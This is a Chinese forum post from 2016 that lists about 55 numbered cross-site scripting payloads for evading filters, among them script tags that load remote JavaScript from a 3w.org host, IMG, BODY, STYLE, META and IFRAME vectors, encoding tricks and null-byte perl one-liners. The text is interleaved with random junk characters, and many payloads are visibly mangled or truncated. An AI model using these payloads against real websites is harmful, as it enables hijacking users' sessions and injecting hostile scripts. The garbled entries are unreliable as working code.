(1)普通的XSS JavaScript注入1 E" Y7 H+ T$ v% X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 S, R. V, w1 L' k1 W. A4 t(99)另类弹框
, N, l/ f1 h$ [: N' b! ~3 B2 p<q/oncut=alert()>1
" {0 Q5 [3 G! s) n* Z5 c<s/onclick=alert()>b! t( P3 T0 I6 E! [$ W
<XSS=" onclick="alert(1)//">clickme</SSX=">- [6 \1 ~5 y) F9 H
<zzz onclick=alert`1`>clickme</zzz>
5 b$ n: t* [+ q1 g' T8 p <a onclick=alert`1`>clickme</a>
! K4 j6 f0 g9 j' q9 Y! J<a=">clickme</a=">
- Q; M6 P* V5 b' m/ U5 q' u<a=">clickme</a>" p& r9 t7 K$ U1 |7 `8 Q
<z=">clickme</z=">
4 z5 ~5 O$ j" ~8 S- Z<z onclick=alert`1`>clickme</z>
" F) {2 v- k0 X' s4 ^0 s6 _, V4 W6 P% ^ ]8 b6 z. b
(2)IMG标签XSS使用JavaScript命令$ s A4 Q' S- E0 B: _3 {& [, G) H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# E, L) j& n2 r: d: t: N9 I1 X- Z- h+ }1 {1 ~) u Q, ^ X
(3)IMG标签无分号无引号! o W J& X, O6 G
<IMG SRC=javascript:alert(‘XSS’)> m2 F. A" A; C$ d1 n/ N
0 c1 Q/ Y0 K2 M5 P+ x2 u(4)IMG标签大小写不敏感
v, P' s) ~5 x5 t0 G7 L<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 }4 v# \, j" J2 r/ I+ d9 I @( E" F- `! N2 k
(5)HTML编码(必须有分号)
& e: Y; d8 a2 X+ f: O% U<IMG SRC=javascript:alert(“XSS”)>3 w" E: D$ J- H( e
8 g% J( c! O5 l% h! w8 O* H4 L' [; F(6)修正缺陷IMG标签8 G0 k3 F* [; U
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ G" t& L: o+ c5 Q8 |4 K5 o+ r; H+ f1 J/ ?* \
(7)formCharCode标签(计算器)
6 y! z/ a4 m# P) B% f<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" U, d9 F5 d4 N' d
6 a2 N0 u) k1 \(8)UTF-8的Unicode编码(计算器)9 A3 Y8 A+ V6 S% M0 t' g) s
<IMG SRC=jav..省略..S')>$ }2 O; X- g& m/ P5 a& c* G
O7 A5 H& X/ h7 E
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# V4 [) L4 y; {5 Y9 H$ ]<IMG SRC=jav..省略..S')>
9 t; K3 G4 n8 K; q7 y+ ^6 J) d0 E0 N* s
(10)十六进制编码也是没有分号(计算器)/ ~# k+ t Z* H4 g
<IMG SRC=\'#\'" /span>
2 q; @/ _4 K7 x( i5 ^5 q; e) t- N3 X0 }3 ~) b L! m# f
(11)嵌入式标签,将Javascript分开
+ d' i. i8 l8 e! Q' {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
) F# z0 h) n! V) |+ `) D ~2 N: @+ }. o. o+ p" p; d0 o; W( j: R
(12)嵌入式编码标签,将Javascript分开: _1 J2 Z% m3 ?8 b! b
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. ^: Z7 X# E) C
: U# Y! v4 \, p* a6 {' v3 \(13)嵌入式换行符
$ K+ m4 w- m, x# g) o<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 C; s1 h" S1 u0 b
! [( {$ b( g7 Q- o
(14)嵌入式回车
- S# {5 Q* j. n' l3 h$ y9 B7 c9 T7 L<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 m1 i5 ^2 Z+ k
( ?0 R6 `7 @. |' o(15)嵌入式多行注入JavaScript,这是XSS极端的例子. J9 I" m/ c8 S' s- y: w
<IMG SRC=\'#\'" /span>( G+ ~, J: B1 V& e: s6 V. D
: N' e: v; a! ~# d1 d9 @
(16)解决限制字符(要求同页面)
' T. I: M) `# t1 P<script>z=’document.’</script>6 Q a! P9 B; l% m
<script>z=z+’write(“‘</script>
% H5 \0 c3 x/ J! H<script>z=z+’<script’</script>
' m; B/ Q, S& I5 u3 C, n; l& @<script>z=z+’ src=ht’</script>
1 w1 P P$ D6 _2 Q$ x/ L# m* N1 v<script>z=z+’tp://ww’</script>2 O% g: f+ M9 u- s' ?& `) i: Z. a
<script>z=z+’w.shell’</script>
' D6 y: A% G% z8 n. h) y<script>z=z+’.net/1.’</script>
; b# `/ y2 J( z) ?<script>z=z+’js></sc’</script>
- m+ ]& L5 g* x9 t( S) r5 T6 S% b! D<script>z=z+’ript>”)’</script>) h6 Y4 R( E. d$ v2 i% E
<script>eval_r(z)</script>* {. V: v, L/ P7 i6 ?
% b+ g, t8 x0 z2 }# ^2 `
(17)空字符) x' _: x, ?+ D8 ~: u- o
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out, K$ H* c! U# k; V" I) p! H
1 q" Y6 s* i" B0 W% z+ x0 a. P
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 v. u5 Y! F) G* _% Sperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# V! ~* C$ @- c& l
/ ~' ^5 J% A/ \$ b3 b* H(19)Spaces和meta前的IMG标签: x3 A5 S% e9 t' v, d
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>' z' s$ e' \! m/ k" S
1 @( {* x% x( Y& B8 s$ F1 k. }
(20)Non-alpha-non-digit XSS3 f, K6 p8 i! G' V# F
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>6 `6 K) j; {% U
+ P. Y, h. D8 P0 ?9 Y) S(21)Non-alpha-non-digit XSS to 2" P: v" h7 ~7 h; Y# r" n6 j
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) K- H6 v( n( i: ]& C
1 |$ O/ P) R0 U* z7 N* g(22)Non-alpha-non-digit XSS to 31 i2 C6 B, K- s: p' l" ?5 p% a
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 ?2 }4 |, F9 x. k3 s' M2 O
( K& E% n; M! ^0 c+ s( X6 V(23)双开括号
4 j9 f7 x3 n; C& k<<SCRIPT>alert(“XSS”);//<</SCRIPT>+ j; v5 \4 ~8 i' ?. G$ R
# v; [4 w' J4 [(24)无结束脚本标记(仅火狐等浏览器)& m9 {" m0 x' D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 C2 N1 O6 _ b7 [* @
' l ` G* O# M5 N$ k6 B9 f' M3 X
(25)无结束脚本标记2
' d8 z) {* D! l6 |) ^5 d<SCRIPT SRC=//3w.org/XSS/xss.js>: {- S0 U( }! D* q2 i8 f1 r: E
# {5 E, t% X& ^' w5 K(26)半开的HTML/JavaScript XSS0 Y/ |# A) J$ t3 d, B9 [$ c* V
<IMG SRC=\'#\'" /span>
7 q/ ?7 c5 ^6 r# u6 {+ f, X0 W- Z" ?9 n1 P
(27)双开角括号
7 S' X# F' m/ w6 N7 `7 \4 w8 B) s<iframe src=http://3w.org/XSS.html <
8 e5 l1 m5 P( d+ z2 ^0 y" v2 C
/ t' f' c G$ i( z/ y0 x(28)无单引号 双引号 分号
( N- I/ O) {- U* W- O. b<SCRIPT>a=/XSS/
1 P5 o7 R* h/ B$ @+ A3 f9 calert(a.source)</SCRIPT>
0 G4 K5 ^2 m9 i( m5 b# Y+ d* W( Q' s$ u3 p7 T
(29)换码过滤的JavaScript# ~6 c6 }/ G4 z7 d. I- S
\”;alert(‘XSS’);//
, r5 R% h8 D2 b/ a: ]$ H7 A7 o6 H# V, w* t& i9 }
(30)结束Title标签
2 }' B, [/ l9 {$ l# z1 V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>5 Z6 P. E3 u0 }8 B" U0 @& ^
2 z) C/ h8 O0 g" X$ v6 @4 [
(31)Input Image* H4 n9 g# D8 \: M7 d
<INPUT SRC=\'#\'" /span>
8 W2 I6 e9 t7 ?& H% L) d5 F0 D' S1 I: E" \/ z
(32)BODY Image
4 h% b9 @7 i( C" n<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' ]" r5 W' K0 O4 i! Q0 t% r7 V
& U# I& J) A1 t, l
(33)BODY标签% g$ [) \0 m5 e2 U
<BODY(‘XSS’)>$ [! }. t; K0 E! t A
2 c4 z( e- ]3 N. ?# _/ |% A(34)IMG Dynsrc
9 ?. I8 i) @$ b: L. t8 U<IMG DYNSRC=\'#\'" /span>7 U/ T- z5 O8 q2 B% j
' N( j# p& x: r3 C. W$ o1 M(35)IMG Lowsrc
/ l# T( {5 T( j/ Q' t) E<IMG LOWSRC=\'#\'" /span>
2 ^6 z1 L5 k( @( B
9 P: A* N* o- a% K) l2 _2 E(36)BGSOUND* g: F I$ ~" f+ H* ~
<BGSOUND SRC=\'#\'" /span>2 f8 J6 D* m7 ]( M5 q
- W2 }" w Y t. l9 Y+ x# Z1 V3 _8 m(37)STYLE sheet" |: K& M3 Y6 k/ g
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 d0 Z7 N* `( _# h7 F' K9 v8 E
; X7 I% }0 X4 |
(38)远程样式表* `5 _* e& [3 V# S2 i$ e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* l1 v- F6 E) q6 L
' s* c8 }( I; n
(39)List-style-image(列表式)
9 _" b, D# E0 f: D) G7 P+ X<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* a* s0 ^. J2 c0 d: h
0 C. y( A/ _: |3 C1 }(40)IMG VBscript
( f# V+ F( e4 x9 g# J$ F<IMG SRC=\'#\'" /STYLE><UL><LI>XSS; B C: Y5 T0 C& W1 |
& i' @1 d6 v% o! L, v/ X n6 c9 R(41)META链接url
[" r* u$ j9 N# H- _: b" x<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 f# p# k% n' K: d4 f. U
! z6 _- h7 S- j$ M5 f, ^
(42)Iframe
% s# E6 Y5 f5 A. Y% O9 o% m<IFRAME SRC=\'#\'" /IFRAME>
4 h+ t% h b$ t& V8 {$ S# K8 A3 v
(43)Frame; c6 p# B7 e% v4 z0 h; b1 Y( z1 T
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
, U" F7 j1 p) [$ g
& ^+ ^( @! k1 e5 v6 k% a* d6 i$ i(44)Table, R* R9 r4 Z! m
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 h2 O( e4 t R, N& T: }7 d9 _9 l- G, J5 R. I/ p
(45)TD9 e' J, E6 W9 I2 `
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ y+ D9 ^; T* v" Z
* E: `- k9 b3 _3 K; f* V" t, g(46)DIV background-image: r" H) ^: r$ c% R+ |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 X( l, Y. A& A7 E3 C. ?
6 H4 y/ q l7 P( q! q) {3 Y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)7 Q% x* D/ g1 P, Z f9 C6 |& k
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
4 p: P' y9 P3 {4 O+ _$ n# d
: A/ C+ r+ y% K) |! y(48)DIV expression
; ^' A) f* n* O+ Y" w<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' [% @0 t6 j6 t% {8 S1 X- O) a
5 y8 l3 X% [& D0 T- J; D/ J; f. X$ {
(49)STYLE属性分拆表达' K, p$ J; k2 S$ E
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>' Q6 L5 p! j: a; r3 U9 F
) w' o/ `# r, U- |2 I6 Y/ C0 ?: r(50)匿名STYLE(组成:开角号和一个字母开头)" s/ O x6 Y% Q) T; {. O. S$ u0 |
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; h9 o C; r- A( P3 F) g
: j0 U0 k* l/ p. J9 b(51)STYLE background-image1 X6 {7 g7 D* v
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" K! a( o1 h' L! s2 l% R- P8 c3 ~
# i7 m3 u6 Y& b2 T* l(52)IMG STYLE方式5 |0 _( r5 x! g O" n+ D/ q/ Q
exppression(alert(“XSS”))’>( Y: o! {3 H' V
( L0 M7 P5 X# `# e! S1 C& e u1 u
(53)STYLE background$ I) g! Y' R( m
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( P9 c/ o- ]2 c1 Q) @
) m- Y' |7 ?: j" H9 }7 z(54)BASE8 B z) W( b# s8 y8 n4 b
<BASE HREF=”javascript:alert(‘XSS’);//”> Q; w* f& p, c
! j: A1 D4 g0 I. @% b7 b7 `2 F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% l' n; w, v! i3 J0 Z
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
* `. T# p3 o/ d5 b7 |+ b& @9 b |
发表于 2016-4-28 10:06:15
收藏
支持
反对